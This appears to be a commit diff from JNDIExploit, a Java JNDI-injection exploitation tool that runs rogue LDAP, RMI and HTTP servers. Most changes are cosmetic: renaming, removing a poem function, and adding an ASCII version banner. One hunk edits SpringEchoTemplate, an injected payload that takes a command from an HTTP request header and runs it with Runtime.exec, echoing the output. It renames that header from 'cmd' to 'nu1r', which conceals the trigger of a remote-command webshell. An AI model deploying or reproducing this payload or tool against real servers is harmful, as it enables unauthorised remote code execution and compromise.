提交项目

nu1r · nu1r · commit c301e975d9c2 · 2022-11-08T16:44:50.000+08:00
diff --git a/README.md b/README.md
@@ -1,4 +1,4 @@
-![JNDI-NU](https://socialify.git.ci/nu1r/JNDI-NU/image?description=1&descriptionEditable=%E4%B8%80%E6%AC%BE%E7%94%A8%E4%BA%8E%20JNDI%E6%B3%A8%E5%85%A5%20%E5%88%A9%E7%94%A8%E7%9A%84%E5%B7%A5%E5%85%B7%EF%BC%8C%E9%80%82%E7%94%A8%E4%BA%8E%E4%B8%8E%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7%E9%85%8D%E5%90%88%E4%BD%BF%E7%94%A8&font=KoHo&forks=1&language=1&logo=https://s1.ax1x.com/2022/09/12/vXqOUI.jpg&owner=1&pattern=Circuit%20Board&stargazers=1&theme=Light)
+![JNDI-NU](https://socialify.git.ci/nu1r/JNDIExploit/image?description=1&descriptionEditable=%E4%B8%80%E6%AC%BE%E7%94%A8%E4%BA%8E%20JNDI%E6%B3%A8%E5%85%A5%20%E5%88%A9%E7%94%A8%E7%9A%84%E5%B7%A5%E5%85%B7%EF%BC%8C%E9%80%82%E7%94%A8%E4%BA%8E%E4%B8%8E%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7%E9%85%8D%E5%90%88%E4%BD%BF%E7%94%A8&font=KoHo&forks=1&language=1&logo=https://s1.ax1x.com/2022/09/12/vXqOUI.jpg&owner=1&pattern=Circuit%20Board&stargazers=1&theme=Light)
 
 # 😈使用说明
 
diff --git a/pom.xml b/pom.xml
@@ -5,10 +5,10 @@
     <modelVersion>4.0.0</modelVersion>
 
     <groupId>org.example</groupId>
-    <artifactId>JNDI</artifactId>
-    <version>NU</version>
+    <artifactId>JNDIExploit</artifactId>
+    <version>2.0</version>
 
-    <name>ysuserial</name>
+    <name>JNDIExploit</name>
     <url>https://nu1r.cn</url>
 
     <build>
diff --git a/src/main/java/com/nu1r/jndi/HTTPServer.java b/src/main/java/com/nu1r/jndi/HTTPServer.java
@@ -22,7 +22,6 @@
 import java.util.jar.JarOutputStream;
 import java.util.zip.ZipEntry;
 
-import static com.nu1r.jndi.gadgets.utils.Util.getVerse;
 import static org.fusesource.jansi.Ansi.ansi;
 
 public class HTTPServer {
@@ -36,7 +35,7 @@ public static void start() throws IOException {
             @Override
             public void handle(HttpExchange httpExchange) {
                 try {
-                    System.out.println(ansi().render("@|green [+]|@" + " [" + Ltime.getLocalTime() + "]" + " [HTTP] " + getVerse() + "@|BG_CYAN --------------------------------------|@"));
+                    System.out.println(ansi().render("@|green [+]|@" + " [" + Ltime.getLocalTime() + "]" + " [LDAP] " + "@|BG_green -----------------------------------------------------------------------------------------------------|@"));
                     System.out.println(ansi().render("@|green [+]|@ @|MAGENTA New HTTP Request From >> |@" + httpExchange.getRemoteAddress() + "  " + httpExchange.getRequestURI()));
 
                     String path = httpExchange.getRequestURI().getPath();
diff --git a/src/main/java/com/nu1r/jndi/LdapServer.java b/src/main/java/com/nu1r/jndi/LdapServer.java
@@ -19,7 +19,6 @@
 import java.util.Set;
 import java.util.TreeMap;
 
-import static com.nu1r.jndi.gadgets.utils.Util.getVerse;
 import static org.fusesource.jansi.Ansi.ansi;
 
 
@@ -42,15 +41,6 @@ public static void start() {
             serverConfig.addInMemoryOperationInterceptor(new LdapServer());
             InMemoryDirectoryServer ds = new InMemoryDirectoryServer(serverConfig);
             ds.startListening();
-            System.out.println(ansi().eraseScreen().render(
-                    "   @|green █████\\|@ @|red ██\\   ██\\|@ @|yellow ███████\\|@  @|MAGENTA ██████\\|@       @|CYAN ██\\   ██\\ ██\\   ██\\|@ \n" +
-                            "   @|green \\__██ ||@@|red ███\\  ██ ||@@|yellow ██  __██\\|@ @|MAGENTA \\_██  _||@      @|CYAN ███\\  ██ |██ |  ██ ||@ @|BG_GREEN v2.0|@\n" +
-                            "      @|green ██ ||@@|red ████\\ ██ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@        @|CYAN ████\\ ██ |██ |  ██ ||@ @|BG_CYAN JNDIExploit-Nu1r|@\n" +
-                            "      @|green ██ ||@@|red ██ ██\\██ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@██████\\ @|CYAN ██ ██\\██ |██ |  ██ ||@\n" +
-                            "@|green ██\\   ██ ||@@|red ██ \\████ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@\\______|@|CYAN ██ \\████ |██ |  ██ ||@\n" +
-                            "@|green ██ |  ██ ||@@|red ██ |\\███ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@        @|CYAN ██ |\\███ |██ |  ██ ||@\n" +
-                            "@|green \\██████  ||@@|red ██ | \\██ ||@@|yellow ███████  ||@@|MAGENTA ██████\\|@       @|CYAN ██ | \\██ |\\██████  ||@\n" +
-                            "@|green  \\______/|@@|red  \\__|  \\__||@@|yellow \\_______/|@ @|MAGENTA \\______||@      @|CYAN \\__|  \\__| \\______/|@"));
             System.out.println(ansi().render("@|green [+]|@ @|MAGENTA LDAP Server Start Listening on >>|@ " + Config.ldapPort + "..."));
         } catch (Exception e) {
             e.printStackTrace();
@@ -90,7 +80,7 @@ public void processSearchResult(InMemoryInterceptedSearchResult result) {
 
         //收到ldap请求
         System.out.println("\n");
-        System.out.println(ansi().render("@|green [+]|@" + " [" + Ltime.getLocalTime() + "]" + " [LDAP] " + getVerse() + "@|BG_CYAN --------------------------------------|@"));
+        System.out.println(ansi().render("@|green [+]|@" + " [" + Ltime.getLocalTime() + "]" + " [LDAP] " + "@|BG_green -----------------------------------------------------------------------------------------------------|@"));
         System.out.println(ansi().render("@|green [+]|@ @|MAGENTA Received LDAP Query >>|@ " + base));
         LdapController controller = null;
         //find controller
diff --git a/src/main/java/com/nu1r/jndi/RMIServer.java b/src/main/java/com/nu1r/jndi/RMIServer.java
@@ -44,7 +44,6 @@
 import sun.rmi.server.UnicastServerRef;
 import sun.rmi.transport.TransportConstants;
 
-import static com.nu1r.jndi.gadgets.utils.Util.getVerse;
 import static org.fusesource.jansi.Ansi.ansi;
 
 
@@ -259,7 +258,7 @@ private boolean handleRMI(ObjectInputStream ois, DataOutputStream out) throws Ex
         }
 
         String object = (String) ois.readObject();
-        System.out.println(ansi().eraseScreen().render("@|green [+]|@" + " [" + Ltime.getLocalTime() + "]" + " [RMI] " + getVerse()));
+        System.out.println(ansi().render("@|green [+]|@" + " [" + Ltime.getLocalTime() + "]" + " [RMI] " + "@|BG_green -----------------------------------------------------------------------------------------------------|@"));
         System.out.println(ansi().render("@|green [+]|@ @|MAGENTA RMI  服务器  >> RMI 查询 |@" + object + " " + method));
         out.writeByte(TransportConstants.Return); // transport op
         try (ObjectOutputStream oos = new MarshalOutputStream(out, this.classpathUrl)) {
diff --git a/src/main/java/com/nu1r/jndi/gadgets/Config/Config.java b/src/main/java/com/nu1r/jndi/gadgets/Config/Config.java
@@ -11,6 +11,8 @@
 
 import java.util.*;
 
+import static org.fusesource.jansi.Ansi.ansi;
+
 public class Config {
     public static String codeBase;
 
@@ -32,6 +34,9 @@ public class Config {
     @Parameter(names = {"-c", " --command"}, help = true, description = "RMI this command")
     public static String command = "whoami";
 
+    @Parameter(names = {"-v", " --version"}, description = "Show version", order = 5)
+    public static boolean showVersion;
+
     @Parameter(names = {"-g", " --gadgets"}, description = "Show gadgets", order = 5)
     public static boolean showGadgets;
 
@@ -75,6 +80,22 @@ public static void applyCmdArgs(String[] args) {
             System.exit(0);
         }
 
+        if (showVersion){
+            System.out.println(ansi().eraseScreen().render("" +
+                    "    /█████ /██   /██ /███████  /██████ /████████                     /██           /██   /██    \n" +
+                    "   |__  ██| ███ | ██| ██__  ██|_  ██_/| ██_____/                    | ██          |__/  | ██    @|BG_GREEN V2.0|@\n" +
+                    "      | ██| ████| ██| ██  \\ ██  | ██  | ██       /██   /██  /██████ | ██  /██████  /██ /██████  @|BG_CYAN Author Nu1r|@\n" +
+                    "      | ██| ██ ██ ██| ██  | ██  | ██  | █████   |  ██ /██/ /██__  ██| ██ /██__  ██| ██|_  ██_/  \n" +
+                    " /██  | ██| ██  ████| ██  | ██  | ██  | ██__/    \\  ████/ | ██  \\ ██| ██| ██  \\ ██| ██  | ██    \n" +
+                    "| ██  | ██| ██\\  ███| ██  | ██  | ██  | ██        >██  ██ | ██  | ██| ██| ██  | ██| ██  | ██ /██\n" +
+                    "|  ██████/| ██ \\  ██| ███████/ /██████| ████████ /██/\\  ██| ███████/| ██|  ██████/| ██  |  ████/\n" +
+                    " \\______/ |__/  \\__/|_______/ |______/|________/|__/  \\__/| ██____/ |__/ \\______/ |__/   \\___/  \n" +
+                    "                                                          | ██                                  \n" +
+                    "                                                          | ██                                  \n" +
+                    "                                                          |__/                                  "));
+            System.exit(0);
+        }
+
         //获取当前 Jar 的名称
         String jarPath = Starter.class.getProtectionDomain().getCodeSource().getLocation().getPath();
         jc.setProgramName("java -jar JNDI-NU.jar");
diff --git a/src/main/java/com/nu1r/jndi/gadgets/utils/Util.java b/src/main/java/com/nu1r/jndi/gadgets/utils/Util.java
@@ -178,18 +178,4 @@ public static boolean isHave(String[] strs,String s){
         return false;
     }
 
-    public static String getVerse(){
-        String[] strs = {
-                "竹杖芒鞋轻胜马，谁怕，一蓑烟雨任平生。",
-                "醉后不知天在水，满船清梦压星河。",
-                "气蒸云梦泽，波撼岳阳城。",
-                "欲买桂花同载酒，终不似，少年游。",
-                "人生天地间，忽如远行客",
-                "人生如逆旅，我亦是行人。",
-                "应是天仙狂醉，乱把白云揉碎。",
-                "行到云穷处，坐看云起时。",
-                "莫愁前路无知己，天下谁人不识君？"};
-        int random_index = (int) (Math.random()*strs.length);
-        return strs[random_index];
-    }
 }
diff --git a/src/main/java/com/nu1r/jndi/template/SpringEchoTemplate.java b/src/main/java/com/nu1r/jndi/template/SpringEchoTemplate.java
@@ -62,7 +62,7 @@ public SpringEchoTemplate() {
                 httpResponse             = (HttpServletResponse) servletResponse;
             }
 
-            String cmd = httpRequest.getHeader("cmd");
+            String cmd = httpRequest.getHeader("nu1r");
             if (cmd != null && !cmd.isEmpty()) {
                 String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
                 httpResponse.getWriter().println(res);

Original file line number	Diff line number	Diff line change
`@@ -1,4 +1,4 @@`
`1`		`-![JNDI-NU](https://socialify.git.ci/nu1r/JNDI-NU/image?description=1&descriptionEditable=%E4%B8%80%E6%AC%BE%E7%94%A8%E4%BA%8E%20JNDI%E6%B3%A8%E5%85%A5%20%E5%88%A9%E7%94%A8%E7%9A%84%E5%B7%A5%E5%85%B7%EF%BC%8C%E9%80%82%E7%94%A8%E4%BA%8E%E4%B8%8E%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7%E9%85%8D%E5%90%88%E4%BD%BF%E7%94%A8&font=KoHo&forks=1&language=1&logo=https://s1.ax1x.com/2022/09/12/vXqOUI.jpg&owner=1&pattern=Circuit%20Board&stargazers=1&theme=Light)`
	`1`	`+![JNDI-NU](https://socialify.git.ci/nu1r/JNDIExploit/image?description=1&descriptionEditable=%E4%B8%80%E6%AC%BE%E7%94%A8%E4%BA%8E%20JNDI%E6%B3%A8%E5%85%A5%20%E5%88%A9%E7%94%A8%E7%9A%84%E5%B7%A5%E5%85%B7%EF%BC%8C%E9%80%82%E7%94%A8%E4%BA%8E%E4%B8%8E%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7%E9%85%8D%E5%90%88%E4%BD%BF%E7%94%A8&font=KoHo&forks=1&language=1&logo=https://s1.ax1x.com/2022/09/12/vXqOUI.jpg&owner=1&pattern=Circuit%20Board&stargazers=1&theme=Light)`
`2`	`2`
`3`	`3`	`# 😈使用说明`
`4`	`4`
Original file line number	Diff line number	Diff line change
`@@ -62,7 +62,7 @@ public SpringEchoTemplate() {`
`62`	`62`	`httpResponse = (HttpServletResponse) servletResponse;`
`63`	`63`	`}`
`64`	`64`
`65`		`- String cmd = httpRequest.getHeader("cmd");`
	`65`	`+ String cmd = httpRequest.getHeader("nu1r");`
`66`	`66`	`if (cmd != null && !cmd.isEmpty()) {`
`67`	`67`	`String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();`
`68`	`68`	`httpResponse.getWriter().println(res);`